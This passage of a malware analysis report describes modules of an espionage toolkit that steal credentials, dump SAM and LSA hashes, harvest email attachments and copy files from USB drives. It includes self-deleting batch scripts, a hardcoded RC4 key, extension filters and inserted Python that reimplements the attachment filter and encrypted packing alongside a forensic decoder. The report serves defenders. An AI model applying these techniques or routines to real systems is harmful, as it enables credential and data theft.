Registry key: HKCU\Software\Mail.Ru\Agent\magent_logins2, binary value: ####password

Registry key/value pair for Mail.Ru Agent version >= 5.7 (the last version, 6, is also supported)
Registry key: HKCU\Software\Mail.Ru\Agent\magent_logins3, binary value: ####password

Text file used by Mail.Ru Agent to store the Blowfish encryption key
%APPDATA%\Mra\Update\ver.txt

The contents of these registry keys are read, and for version 5.7 and above the Blowfish key stored inside “ver.txt” is used to decrypt the passwords.

All actions are logged with time stamp, and then encrypted and written to %temp%\~avp2.log.

The module will attempt to access “ver.txt”, which is protected on the system. If it cannot read the file using standard API functions, it falls back to low-level NTFS access.

In order to do so, it uses the DeviceIoControl API function with the “FSCTL_GET_NTFS_VOLUME_DATA” and"FSCTL_GET_NTFS_FILE_RECORD" IOCTLs.

The data of this file is also written to %temp%\~mslog.tmp, which serves as a backup of “ver.txt”. Afterwards the module builds a new string consisting of the current timestamp followed by delimiting dashes and an indication that the module has finished running, such as “2012:11:10:10:22:34-------PROGA END”. This string is written to the ~avp2.log file.

Here is an example of a decrypted ~avp2.log file:

"2012:11:22:17:21:44"-------PROGA START-----
"2012:11:22:17:21:44"ERROR ACCESS file ver.txt
"2012:11:22:17:21:44"FILE SYSTEM NTFS
"2012:11:22:17:21:44"PROBING GET FILE LOW LIVEL
"2012:11:22:17:21:44"ACCESS LOW LIVEL OK!!!!
"2012:11:22:17:21:44"REG OPEN KEY[Software\Mail.Ru\Agent\magent_logins3]
"2012:11:22:17:21:44"SUB KEY[000#[email protected]]
"2012:11:22:17:21:44"uin(0)[000#[email protected]] passwd(0)[%removed%]
"2012:11:22:17:21:44"-------PROGA END-----

The string between "[" and "]" is the binary value of the MD5 hash of the Mail.ru Agent password.


All recovered credentials are also stored encrypted in the “~pass2.pwl” file, without the timestamp information and without the record of how they were accessed.

The word “PROGA” used here is likely a transliteration of the Russian slang “ПРОГА”, which literally means an application or a program.

Attachment stealing
The module then attempts to steal open attachments, or attachments that were open when the machine or the Outlook application shut down unexpectedly. It identifies and collects these files from a directory path of the form “C:\Documents and Settings\%username%\Local Settings\Temporary Internet Files\OLK%xxx%”.

Failed persistence
The module then attempts to maintain some persistence on the system by repeating the routine. It creates %temp%\19d400.msv and attempts to write a copy of its own executable contents to it. Oddly, the WriteFile size parameter is set to 0 and the write fails. It then attempts to run this 19d400.msv file by calling CreateProcessA on it, which also fails. The module thread then terminates the process.

Finally, it is interesting that network functionality is absent from this module.

Interesting decrypted runtime strings:

19d400.msv
Software\Mail.Ru\Agent\magent_logins2
Software\Mail.Ru\Agent\magent_logins
~pass.pwl
~avp.log
www.mail.ru
ProcessRead ok!
OPEN PROCESS agent_mail.ru OK!
%s-------PROGA END-----
-------PROGA START-----
SUPER MUTEX
19d400.msv
~mslog.tmp
%sPROBING GET FILE LOW LIVEL
%sACCESS LOW LIVEL OK!!!!
%sERROR OPENFILE
%sERROR GET ACCESS LOW LIVEL

PswOutlook module
Known variants:

MD5 Compilation date

f6e1637e04b33a3e0c57ab355d3e677e 2010.11.30 07:10:32 (GMT)

fa66821fd895b3814e501b804176ef98 2011.02.23 12:41:29 (GMT)

Summary
The file is a PE EXE file, compiled with Microsoft Visual Studio 2008. All the functionality is implemented in the WinMain function. There are 2 known variants of this module in over 50 files with identical behavior.

Like PswSuperMailru, this highly obfuscated module is very different from the others. Its main purpose is to steal the e-mail credentials of the current user. This is achieved by reading the system Protected Storage and the system registry. The result is stored in an encrypted file, after which the application removes itself.

Main function
This module starts by decrypting pieces of information carefully puzzled together in the file body. The puzzle contains extra library names, export function names, their parameters and a set of internal references. The encryption algorithm resembles PKZIP encryption but seems to be modified.

The decrypted data is carefully collected and filled into a set of internal objects. Next, the module connects to the local registry using the RegConnectRegistry system API call. It is not clear why the developers decided to use RegConnectRegistry: they either tried to bypass some local IDS/IPS systems by avoiding the RegOpenKey/RegOpenKeyEx calls, or the application was designed to connect to remote computers as well. In all samples we have observed, the lpMachineName parameter is set to NULL, meaning it connects to the local registry.

It dumps MS Outlook account information from the following registry keys:

HKCU\Software\Microsoft\Internet Account Manager
HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

After that it attempts to access and dump local protected storage identities information via PStorec.dll API.

The collected information is stored in an encrypted file: %Temp%\{B30BD41D-46E7-458B-F412-4D7F80CCAD0F}. The file contains a 32-bit hash of the data at the end.

This module never communicates with the C&C server and works as a standalone tool. In the end of execution before exitingapplication it runs self-removal procedure as described below.

Self-removal procedure
When the module needs to end its execution and remove itself, it spawns a %COMSPEC% process (cmd.exe, or command.com on older systems) using the following command line:

cmd.exe /c del /F /A “%MODULE_PATH%”>> NULL

This procedure is very unreliable as it is prone to race-condition issues which might result in modules remaining undeleted.

MSHash module
Known variants:

MD5 Compilation date

3538fea2c2f9a7117a6a919c87112731 2011.11.01 15:04:58 (GMT)

a008d1ec659c3758e95bc3f0aafbe3a5 2011.08.05 07:40:37 (GMT)

68d72e12c402038195175b568b3dd0bb 2012.10.22 07:01:30 (GMT)

4b62cc78508b46d74cdd172dc493ec8a 2011.11.01 15:04:58 (GMT)

Summary
This module is a standalone executable, essentially a tool to dump cached domain password hashes and locally stored sensitive information such as LSA secrets. It uses direct disk access to bypass the system registry ACLs. After execution the module removes itself.

First, it uses direct disk access to copy the registry hive files from the %SYSTEM%\config\ directory:

%SYSTEM%\config\sam -> %Temp%\ksm
%SYSTEM%\config\system -> %Temp%\kss
%SYSTEM%\config\SECURITY -> %Temp%\kse

The module then extracts the available cached domain account hashes as well as the local system LSA secrets. The latter may contain logins and passwords for various services in plaintext. It also fetches the Syskey boot key and appends it to the output.

The result is stored in an encrypted file of custom binary format located at %TMP%\smrdprev<RANDOM_16DIGITS_HEXNUMBER>.tmp. The file contains an internal file reference string that includes the date and time of creation, e.g. "@MSHASH\SAMHASH_2_20121002_034519.txt". This is probably the suggested relative path and file name used during the data extraction procedure on the attackers' system.

The module also creates an encrypted log file with detailed information about the program's execution. It is stored in a similarly named file, “%TMP%\smrdprev<hex number>.tmp”, where the hex number depends on the current system boot time. It is encrypted in the same way as the main output file, using a custom crypto algorithm based on the AMPRNG method.

The module also tags the current system by setting the following registry values:

HKCU\Software\Microsoft\ADOSoftware32\ProductID = binary value of 20 bytes (System ID)
HKLM\Software\Microsoft\ADOSoftware32\ProductID = binary value of 20 bytes (System ID)

The System ID is calculated as the SHA1 hash of the system drive's volume serial number and the HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration\ProductID value. These keys remain after the malware removes itself and are a good indicator that a system was hit by this module in the past.

Most of the cryptoroutines such as DES, RC4, HMAC_MD5, MD4 are used from statically linked OpenSSL 0.9.8g library.

After finishing, it deletes its temporary files and removes itself with a simple msc.bat file with the following contents:

chcp 1251
:Repeat
attrib -a -s -h -r "<module_filename>"
del "<module_filename>"
if exist "<module_filename>" goto Repeat
del "msc.bat"

Note that the batch file first sets the console codepage to CP1251, which is used to display Cyrillic characters in console output.

4. Email group

MAPIClient module
Known variants:

MD5 Compilation date

09e75477e03a968eead17a28d8aef0ce 2012.10.26 07:02:24 (GMT)

10603f7ec89c3472b238e9342f5ba62b 2011.10.10 11:37:27 (GMT)

C196e32764dc698bb88714adfb874667 2012.05.04 11:31:35 (GMT)

0fe600e06a69ccebbb5baf6c9f5f51a6 2011.12.02 07:34:41 (GMT)

c3a50d78669cd58b2cd4e38e30c1e986 2011.11.11 07:13:55 (GMT)

298c4562c8463bed3039ff2d12669adc 2011.09.02 05:08:00 (GMT)

1f91b25d0893d4e1b0418ffeb21f1f03 2011.10.10 11:37:27 (GMT)


521b45d21b4b2fc48f7ab29ab222d6ee 2011.11.11 07:13:55 (GMT)

7883b174ce69ffed41d3aea54855ff97 2011.06.10 06:11:48 (GMT)

3975b42d9bb39741e988f78020edeb44 2011.11.11 07:13:55 (GMT)

Summary
The file is a PE EXE file, compiled with Microsoft Visual Studio 2010. All the functionality is implemented in the WinMain function.

This module is used to steal the e-mail of the current user, collecting the most valuable information about messages: the general fields (To/From/Date/Subject), the full MIME headers and message body, and attachments whose extension looks interesting (documents, archives, crypto keys). The result is stored in a set of encrypted and compressed files, after which the application removes itself.

Main function
It starts by creating a new encrypted log file in the current directory of the executable, named “system32ocxms.dat”. The first log entries contain the following:

Program started
V: MSG_26.10.12

This probably indicates the internal module name (MSG) and version (set after the date of creation, 26.10.12). The application has no embedded config/script file in its resource section; all parameters are hardcoded.

Next it fetches the current system general information and default application preferences from the registry, including thefollowing:

User name
Computer name
User domain name (from %USERDOMAIN% and %USERDNSDOMAIN%)
Default system HTTP protocol handler from HKCR\HTTP\shell\open\command
Default system HTTPS protocol handler from HKCR\https\shell\open\command
Default system application for html files from HKCR\htmlfile\shell\open\command
Default system e-mail client from HKCR\mailto\shell\open\command

This information is added to the log file.

Next it checks whether MS Outlook is installed, whether it is currently running, and whether it is the system's default e-mail client. This is appended to the log as well.

In the next step it creates a watchdog thread, which checks the foreground window every 10 milliseconds; if the current foreground window belongs to the current process, it spawns the self-removal batch file (see the description in the section below) and terminates the current process. This handles the case where the Microsoft Windows MAPI framework creates a popup message with a connection error report or asks the user to enter mailbox credentials. The developers obviously wanted to avoid unnecessary attention, and decided it was better to shut down and remove the module without collecting any information than to get caught by attracting attention.

After the watchdog thread is created, the module lists the local user's mail addresses by connecting to the system MAPI. It gets the user e-mail, address type and user name. Next it iterates through the existing MAPI stores of the current user and dumps full information about all messages to the main log file, including e-mail header values such as

Subject
From
To
Date
AttachmentID
AttachmentName
AttachmentSize

The e-mails of interest to the attackers, with attachments, are saved in a separate encrypted and Zlib-compressed storage file (a new storage file is created for each directory):

%CurrentDir%\sys_%HexNumber%\winocx_%IntegerCounter%_rdtp.tmp

The attachment storage file is limited to 60 MB. The RC4 encryption key is:

specialforoutlookattachments!

The filter for interesting e-mails is defined as a list of regular expressions (the PCRE library is used to process them):

.doc .xls .txt .vcf .p7m .mdb .msgz .dcx .egk .zm9 .docx .xlsx .eml .CCC .cif .fas .msg .kum .key .out .rtf .pdf .enc .TOK .wps .sbox .lock .ass .cer .pem .odt .rar .html .xia .sec .cm5 .xps .pgp .wfh .cbu .ods .zip .htm .xis .dat .rhs .x05 .xiti .grp .sig .dot .gpg mht .p7s .dth .max .y05 .egm .pot .ftil

The module is also capable of dumping the full contents of the local system Address Book; however, this functionality is currently disabled by the developer (probably because of bugs in the code).
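As an added example (not the module's own code), the following Python reproduces the two mechanisms described above: the extension filter applied to attachment names and the RC4-encrypted, zlib-compressed storage file. The RC4 key is the one quoted on the page; the regex anchoring, case-insensitivity, the record layout inside the storage file and the order of compression and encryption are assumptions, which is why unpack_storage tries both orders. The attachments are constructed for the example.

```python
import re
import zlib

RC4_KEY = b"specialforoutlookattachments!"  # key quoted in the text

# Extension list from the module. The page prints it as a flat PCRE list; anchoring each
# pattern to the end of the file name and matching case-insensitively are assumptions
# ("mht" appears without a dot on the page and is taken as ".mht" here).
INTERESTING_EXTENSIONS = """
.doc .xls .txt .vcf .p7m .mdb .msgz .dcx .egk .zm9 .docx .xlsx .eml .CCC .cif .fas .msg
.kum .key .out .rtf .pdf .enc .TOK .wps .sbox .lock .ass .cer .pem .odt .rar .html .xia
.sec .cm5 .xps .pgp .wfh .cbu .ods .zip .htm .xis .dat .rhs .x05 .xiti .grp .sig .dot
.gpg .mht .p7s .dth .max .y05 .egm .pot .ftil
""".split()
ATTACHMENT_FILTER = re.compile(
    "(?:" + "|".join(re.escape(e) for e in INTERESTING_EXTENSIONS) + ")$", re.IGNORECASE)


def is_interesting(filename):
    return ATTACHMENT_FILTER.search(filename) is not None


def rc4(key, data):
    # textbook RC4 (KSA + PRGA); encryption and decryption are the same operation
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# Record layout inside a storage file is not given on the page; this one is an assumption:
# 2-byte name length, name, 4-byte data length, data, repeated.
def pack_storage(records, key=RC4_KEY, compress_first=True):
    body = bytearray()
    for name, data in records:
        nb = name.encode("utf-8")
        body += len(nb).to_bytes(2, "little") + nb + len(data).to_bytes(4, "little") + data
    body = bytes(body)
    return rc4(key, zlib.compress(body)) if compress_first else zlib.compress(rc4(key, body))


def _split_records(body):
    pos, out = 0, []
    while pos < len(body):
        n = int.from_bytes(body[pos:pos + 2], "little"); pos += 2
        name = body[pos:pos + n].decode("utf-8"); pos += n
        size = int.from_bytes(body[pos:pos + 4], "little"); pos += 4
        out.append((name, body[pos:pos + size])); pos += size
    return out


def unpack_storage(blob, key=RC4_KEY):
    """Try both orders, since the page only says 'encrypted and Zlib-compressed'."""
    for attempt in (lambda b: zlib.decompress(rc4(key, b)),
                    lambda b: rc4(key, zlib.decompress(b))):
        try:
            return _split_records(attempt(blob))
        except (zlib.error, UnicodeDecodeError):
            continue
    raise ValueError("neither decrypt-then-inflate nor inflate-then-decrypt produced records")


def collect(attachments):
    """Filter a mailbox's attachments the way the module does and pack the keepers."""
    kept = [(n, d) for n, d in attachments if is_interesting(n)]
    return kept, pack_storage(kept)


# Constructed sample attachments (names and contents invented for the example).
SAMPLE_ATTACHMENTS = [
    ("budget_2012.XLSX", b"PK\x03\x04" + b"\x00" * 16),
    ("holiday.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 8),
    ("id_rsa.key", b"-----BEGIN RSA PRIVATE KEY-----\n"),
]

if __name__ == "__main__":
    kept, blob = collect(SAMPLE_ATTACHMENTS)
    print([n for n, _ in kept], len(blob), "bytes packed")
    print(unpack_storage(blob) == kept)
```

For a recovered winocx_*_rdtp.tmp file, the part that carries over is unpack_storage: the key is fixed in the module, so the only unknowns are the container layout and the compress/encrypt order, and the function makes the latter a non-issue.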

This module never communicates with the C&C server and works as a standalone tool. In the end of execution before exitingapplication it runs self-removal procedure as described below.

Self-removal procedure
When the module needs to end its execution and remove itself, it creates a batch file with a pseudo-random name: %HOMEDRIVE%%HOMEPATH%\Local Settings\Temp\<HEXDIGITS(4-7 digits)>.bat.

If it couldn't create random name, the name will be set to "syspart.bat".

The file contains:

:Repeat
del /F /A "<CURRENT_MODULE_FILE_PATH>"
if exist "<CURRENT_MODULE_FILE_PATH>" goto Repeat
del /F /A "<CURRENT_MODULE_FILE_PATH>"

POP3Client module
Known variants:

MD5 Compilation date (encrypted) Compilation date (payload)

224c382316be4be7e0009f08b84cd91e 2011.09.26 06:54:09 (GMT) 2011.05.25 11:49:19 (GMT)

100e53ee8fbeb4546b31eb7e0aad8752 2011.07.27 07:37:01 (GMT) 2011.05.25 11:49:19 (GMT)

Summary
The file is a PE EXE file, compiled with Microsoft Visual Studio 2005.

This module is responsible for receiving e-mail messages from a POP3 server specified in a configuration file and storing them on the local computer. All actions and important information are written to a log file.

Main function
Creates the mutex "208D2C60-3AEA-1069-A2D7-08002B30309D".

Creates a directory and a log file in it: %ALLUSERSPROFILE%\Application Data\System\smrdprev.%d%d.tmp (the %d values correspond to time64() ^ 0x1F3E231 and GetTickCount()).

Installs in system AutoRun:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"LgfxTray" = PathToExe

Other Registry entries:

HKLM\SOFTWARE\Microsoft\ADOSoftware32
HKCU\SOFTWARE\Microsoft\ADOSoftware32
"ProductID" = SHA1(MAC, AdapterIP, VolumeSerialNumber, IE Product ID)

Always starts the log file from:

@LOG\CMAIL_LOCAL_v1_ %YEAR%%MONTH%%DAY%_%HOUR%%MIN%%SEC%.txt
Software version: 0.8
Current Directory: %s
"--------PROGA START-------"

Opens mutex "huiofwhfiowjcpowjkcwcophwvurweionwopmcvopwkvpwjnhopv", if it exists, then module terminates.

Tries to open the config file “jusched32s.dat” and read its contents. If the file doesn't exist, it terminates. It checks the MD5 hash stored in the file header (the first 16 bytes); if it has changed since the last saved MD5 (kept in memory as a variable), it updates the variable and writes the new hash to the log file.

If calculated hash of the file buffer matched the header hash then module decrypts and parses config file and launchesPOP3 client thread, otherwise terminates.

Parameters in config file:

common
account
config_id
email_hash_path
storage_path
storage_size
load_period
time_delta
size_min
size_max
storage_hash_size
uninstall
login
password
pop3server
imapserver
use
email

If the "uninstall" parameter is set in the config file, the module deletes the AutoRun keys in the registry and the config file jusched32s.dat, and terminates.

POP3 client thread

By default, connections are not encrypted with SSL. The variable that controls whether SSL encryption is used for the network communication is, for some reason, never initialized.

Establishes a connection based on ‘pop3server’ (or ‘imapserver’), ‘login’ and ‘password’ parameter values in config file.

After receiving the number of emails as a response on STAT command starts processing emails in cycle.

Forms an MD5 hash from a string in the format “%s%s%s” composed of the 'login' parameter, the 'pop3server' parameter and a value that depends on the number of the currently processed e-mail and the UIDL response.

Seeks in directory specified in 'email_hash_path' for *mso.dat files, reads their contents and compares the hashes stored inthem with calculated hash.

If calculated hash is found in the contents, then the module doesn’t process the current email, otherwise gets email messagesize from a POP3 server with a LIST command.

Creates the file %email_hash_path%\%s%.mso.dat (%s = CRC32(GetUserName)) and appends the computed hash to it. If the new file size exceeds 'storage_hash_size', it rewrites the file with the latest data so that its size does not exceed 'storage_hash_size'.

If email size is in the range 'size_min'-'size_max' then the module retrieves email headers and email message body,otherwise stops email processing. Then the module parses the response, retrieves the date of email, counts days elapsedand compares it to 'time_delta'. If it's bigger than 'time_delta' then breaks the email processing cycle.

Creates the file %storage_path%\bcmntc.%d.tmp (%d = time64() ^ 0x1F3E231) with decrypted contents including the e-mail header @CMAIL_LOCAL\%s_%04u%02u%02u_%02u%02u%02u\%d.eml ('email' field, date, e-mail number) and the e-mail contents themselves. Some buffers are compressed with zlib.

All the collected data is stored locally and isn’t uploaded to any C&C by this module.

5. USB Drive group

USBContainer module
Known files

MD5 Compilation date (encrypted)

b9568a91d6f6b0904de8b2e9d9a2d32c 2010.06.01 11:24:07 (GMT)

f0eaec0b25afc24a416810fe46242590 2010.06.01 11:24:07 (GMT)

865ba7958efe7e54501dcf2c19dcd99e 2010.06.01 11:24:07 (GMT)

Summary
This is a standalone EXE application module used to drop and run the USBStealer module (IGFXTRAYMS.exe) along with its configuration file (imapisync32.dat).

Those two files are zlib compressed and stored in the overlay of the dropper.

Main function
Upon execution, the dropper reads its overlay and decompresses it in memory.

The configuration file "imapisync32.dat" is dropped first, followed by the opening of a system event named "ScxinWordSid_0129211FA". This event is created by the USBStealer module.

Afterwards, it will try to delete the "IGFXTRAYMS.EXE" file without checking if it exists or not.


The USBStealer module is then dropped under the file name "IGFXTRAYMS.EXE" and executed. Both files are dropped into the same directory as the dropper.

Finally, the following will be executed 3 times before exiting:

C:\WINDOWS\system32\cmd.exe /c del C:\DOCUME~1\%PATH_TO_DROPPER.EXE% >> NUL

This module doesn’t create any execution log files, nor does it connect to the C&C servers.

USBRestore module
Known files

MD5 Compilation date (encrypted)

9572cc04fd442027cfd61178bdf73c0c 2011.07.15 12:30:29 (GMT)

feba0bbead1a810c223cf8252b529d65 2011.06.02 12:30:50 (GMT)

4aabfd510ef66e066946087617638090 2011.06.02 12:30:50 (GMT)

1d124d06666cfa6b33768f1147208b9c 2011.07.15 12:30:29 (GMT)

260ad160972ca6bc071b7cb518a9b5fa 2011.06.02 12:30:50 (GMT)

ab72d7ed99c3c18f2582b6e9cd5ec875 2011.06.02 12:30:50 (GMT)

ef6751567cbf7c92cd3880fc7aa425c9 2011.07.15 12:30:29 (GMT)

56c06123e34dcc8a8e464da9acd852bb 2011.05.23 11:33:26 (GMT)

a6d549d7c90c412a20fc9e7abc829eb5 2011.07.15 12:30:29 (GMT)

be6f3c214d2a579728fc3537c6454f8c 2011.07.15 12:30:29 (GMT)

0883d6533aa4fb0e40a6e48a66ea84d4 2011.05.23 11:33:26 (GMT)

c3e70e9b50cd3f6cfcd0ac75a60b3464 2011.06.02 12:30:50 (GMT)

75b824c5a6a9b950ccbdaee577fe964b 2011.07.29 10:59:44 (GMT)

9bb26fb5179db8515cdc81cb9f40387d 2011.07.29 10:59:44 (GMT)

d9851c67bfeec5cc37db99be07061857 2011.06.02 12:30:50 (GMT)

07999110cab8c6558be11684d2c02793 2011.07.15 12:30:29 (GMT)

9d5bb8f9441d31148bf4f190e27764cc 2011.06.02 12:30:50 (GMT)

ecd7bec9522e64df7b179b512e71c154 2011.06.02 12:30:50 (GMT)

5e215b9272e4a0ff0d9725ac94bd1541 2011.06.02 12:30:50 (GMT)

9a9dbd2a398fda91167169b0866047d1 2011.07.15 12:30:29 (GMT)

4355f29680630980cf732e46306a39ce 2011.07.15 12:30:29 (GMT)

d4d959bffa33b0e3076421a02e69f13b 2011.07.15 12:30:29 (GMT)

f2bb34acdebcbbd335e6cc2816a0c5f0 2011.06.02 12:30:50 (GMT)

ca25ca44ef0106c4080415f1c2090400 2011.07.15 12:30:29 (GMT)

83ee5deb488d58d924134781e76c416c 2011.06.02 12:30:50 (GMT)

9aa8f3ed12ef1003d24c771af69879f8 2011.07.15 12:30:29 (GMT)

19cc111e41d804f20e5f65c6d0a48953 2011.07.15 12:30:29 (GMT)

acfc7040304b19422ba0a1278b4d9c48 2011.05.23 11:33:26 (GMT)


a515279eee527f7d20f82ef673308151 2011.06.02 12:30:50 (GMT)

Summary
This module is a standalone Windows executable which is started automatically on system boot and runs hidden in the background. It waits for removable media to arrive and recovers deleted files of interest to the attackers from it. This lets the attacker copy deleted documents as well as ZIP and RAR archives from attached removable media.

Initialization
Upon start the module creates a general-purpose log file in %TMP%\smrdprev.<DWORD1><DWORD2>.tmp, where DWORD1 is the current time value XORed with 0x1F3E231 and DWORD2 is the value returned by the GetTickCount() API call.

So the log file path is essentially %TMP%\smrdprev.<RANDOM_HEX_NUMBER>.tmp. The same XOR value is used across all the variants we have seen (20+ files).

The general log starts with the internal module name, which is "USB_RESTOREv1". It also logs the software version, which is "0.5" for the current module. Other variants had different hardcoded versions: we have seen 0.3, 0.5 and 0.6. However, a few files carry no indication of an internal module version and are probably the earliest versions. The log file also includes detailed information about the system it was launched on. Example of system info:
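Both the POP3Client log (smrdprev.%d%d.tmp) and this module's log (smrdprev.<DWORD1><DWORD2>.tmp) encode their creation time in the file name as time ^ 0x1F3E231. The following Python is an added forensic helper, not part of the report or of the malware: it rebuilds both name forms and recovers the timestamp from a name found on disk. Zero-padded 8-digit hex for DWORD1 and the 2010-2013 plausibility window used to resolve the ambiguous %d%d split are assumptions.

```python
import re
from datetime import datetime, timezone

XOR_CONST = 0x1F3E231          # quoted on the page for both modules
EARLIEST = datetime(2010, 1, 1, tzinfo=timezone.utc)   # plausibility window (assumption)
LATEST = datetime(2013, 12, 31, tzinfo=timezone.utc)

_HEX = re.compile(r"smrdprev\.([0-9a-fA-F]{8})([0-9a-fA-F]{1,8})\.tmp")
_DEC = re.compile(r"smrdprev\.(\d+)\.tmp")


def utc(y, mo, d, h, mi, s):
    return datetime(y, mo, d, h, mi, s, tzinfo=timezone.utc)


def hex_log_name(unix_time, tick_count):
    # USBRestore form: two DWORDs printed as hex (8-digit zero padding is an assumption)
    return "smrdprev.%08x%08x.tmp" % ((unix_time ^ XOR_CONST) & 0xFFFFFFFF,
                                      tick_count & 0xFFFFFFFF)


def decimal_log_name(unix_time, tick_count):
    # POP3Client form: the same two values printed with %d%d, no separator
    return "smrdprev.%d%d.tmp" % ((unix_time ^ XOR_CONST) & 0xFFFFFFFF,
                                  tick_count & 0xFFFFFFFF)


def _plausible(t):
    return EARLIEST.timestamp() <= t <= LATEST.timestamp()


def recover_hex(name):
    """(creation datetime, GetTickCount value) from a USBRestore-style name, or None."""
    m = _HEX.fullmatch(name)
    if not m:
        return None
    t = int(m.group(1), 16) ^ XOR_CONST
    return datetime.fromtimestamp(t, timezone.utc), int(m.group(2), 16)


def recover_decimal(name):
    """%d%d leaves no separator, so try every split and keep those whose recovered time
    falls inside the plausibility window; returns a list of (datetime, tick_count)."""
    m = _DEC.fullmatch(name)
    if not m:
        return []
    digits = m.group(1)
    out = []
    for cut in range(1, len(digits)):
        head, tail = digits[:cut], digits[cut:]
        if len(head) > 1 and head[0] == "0":   # %d never prints leading zeros
            continue
        t = int(head) ^ XOR_CONST
        if t < 2 ** 32 and _plausible(t):
            out.append((datetime.fromtimestamp(t, timezone.utc), int(tail)))
    return out


# Constructed sample: a log created 2012-11-12 15:07:26 UTC, 4021987 ms after boot.
SAMPLE_TIME = int(utc(2012, 11, 12, 15, 7, 26).timestamp())
SAMPLE_TICK = 4021987

if __name__ == "__main__":
    print(recover_hex(hex_log_name(SAMPLE_TIME, SAMPLE_TICK)))
    print(recover_decimal(decimal_log_name(SAMPLE_TIME, SAMPLE_TICK)))
```

The decimal form looks ambiguous, but for any timestamp in the window the XORed value is always ten digits, so the split is unique in practice; the window is what makes the brute force terminate with one answer.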

TIME: "2012-11-12 18:07:26 514"
ADMIN: "1"
UserName: "user"
ComputerName: "WIN_XP_105"
TimeZone: "Russian Standard Time"
LOCALE: "Russian_Russia.1251"
OEMCP: "866"
ACP: "1251"
OwnFile: "C:\wusb.exe"

The module changes registry to run automatically during system start:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctfmon32rt = <path to current executable>

If it fails to set the value under HKLM, it tries to set the same value under HKCU.

Next, it checks whether the current user has local administrator rights and logs the result as well ("----ADMIN MODE----" or "----USER MODE----").

One more string is added to the log which indicates end of initialization stage and start of main functionality: "WUSB: begin".This is probably a reference to another module internal name: "WUSB".

Main Procedure
It creates an invisible window named "sbw" (Unicode) with window class "Win32UserHost". The module calls the RegisterDeviceNotification() API to receive system notifications for particular device interface GUIDs:

F18A0E88-C30C-11D0-8815-00A0C906BED8 (GUID_DEVINTERFACE_USB_HUB)
A5DCBF10-6530-11D2-901F-00C04FB951ED (GUID_DEVINTERFACE_USB_DEVICE)

Thus the module waits for notifications about USB hubs or USB devices attached to the local system. According to the notification handler code, the module is only interested in newly attached volumes, except those mapped to the letter A: (reserved for floppy drives). Once a new volume appears in the system, the module starts a separate thread to process the event. A device is never processed twice until it is plugged in again: the module keeps track of the currently mounted devices and handles device removal events properly.

Page 67: Red october. detailed malware description

When a new USB drive is attached, the module obtains the USB device software and vendor ID, drive letter, volume name, filesystem type, volume serial number, and the number of free and used bytes. Then it reads the filesystem using direct disk access and its own parser for FAT-based filesystems. It is unable to read other filesystems, including NTFS.

The own filesystem parser code allows the module to avoid using the system API to access files, and thus bypass various IDS/IPS software, while at the same time looking into the slack space of the disk. This lets the attackers reveal already deleted files on removable drives. The module creates an additional debug log which traces execution events and records all problems that have occurred. The filesystem parser log files are located in %TMP%\hsperfdata32sys\bcmntc_rt_*

The parser log includes all discovered filenames, including deleted files. The same module is capable of recovering deleted files. It can recognize file types and recover original files depending on the format. It is designed to recognize the following file headers: DOCX, XLSX, DOC, XLS, RAR, ZIP. Recovered files are saved in %TMP%\hdbrt32sys\ms32jxtr.dat.

All files created by the module, including logs, are stored in a custom binary format, which may use Zlib compression and custom encryption.

This module doesn't communicate with any C&C server; all files are stored locally.

USBStealer module

Known files

MD5 Compilation date (encrypted)


Summary

This is a standalone EXE application module which is used to automatically track and steal interesting files on removable disks attached to the infected system. It starts automatically on system boot. Criteria for files are defined in an external encrypted binary config file which must be deployed during setup. It creates its own database of known files' hashes and registers a listener for filesystem changes to do that efficiently.

Initialization

At the start it creates a system mutex named 'Win32Wbem32Prefetch', a system event named "ScxinWordSid_0129211FA" (used to signal the end of execution) and a log file at %TMP%\imapispool.<HEXNUMBER1>.0x<HEXNUMBER2>.ids.

It collects basic system information such as the current computer name, the current username, and the path to the original executable module it started from.

This information is put in the log file first, along with the current date and time. Every time the module adds anything to the log file, it checks whether the log file exceeds 15MB in size. If so, it deletes the current log file and opens a new one using the same path.

It changes registry settings to start automatically on system boot. The changes are made to the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winns32comp value.

Main Procedure

It creates an invisible window named "sbw" with window class "Win32UserHost". This window receives notifications from specific device types. The module calls the RegisterDeviceNotification() API to listen for notifications from the system on particular device GUIDs:

F18A0E88-C30C-11D0-8815-00A0C906BED8 (GUID_DEVINTERFACE_USB_HUB)
A5DCBF10-6530-11D2-901F-00C04FB951ED (GUID_DEVINTERFACE_USB_DEVICE)

At the same time it creates a config monitoring thread which reacts to file changes and reloads new values. The config files are stored in the same directory as the current executable module and are named "imapisync32.dat" and "wmilibrt.dat". imapisync32.dat is encrypted using some custom algorithm, and holds information about file targets to track and copy if found. There are common criteria of file size, file age, etc. The module utilizes the PCRE (Perl Compatible Regular Expressions) library to effectively apply regular expression whitelists and blacklists against filenames. The criteria are split into groups, and parameters are named with the specific prefix of the group (a, d, s, sd, fa). If a group name ends with "a", it is used as a whitelist: filenames that match such regexps are to be stolen. Groups ending with "d" represent a blacklist: matching files will be ignored. Below is the full decrypted config (imapisync32.dat) with our comments after the "#" character:

magic=/lddata/ # magic string identifying config file start
_st_size=/300000000/ # max size of the storage (300MB)
_id=/00020/ # internal storage id
_fdeltatime= /2592000/ # files must be not older than 2592000 seconds or 30 days
_max_size=/20000000/ # maximum size of a single file must be not larger than 20MB
_min_size=/1/ # files must not be smaller than 1 byte
a=/\.txt$/
a=/\.csv$/ # Comma-Separated Values, tabular data file
a=/\.eml$/ # exported e-mail file
a=/\.doc$/
a=/\.vsd$/ # MS Visio document file
a=/\.sxw$/ # StarOffice/OpenOffice document file
a=/\.odt$/ # OpenOffice document file
a=/\.docx$/
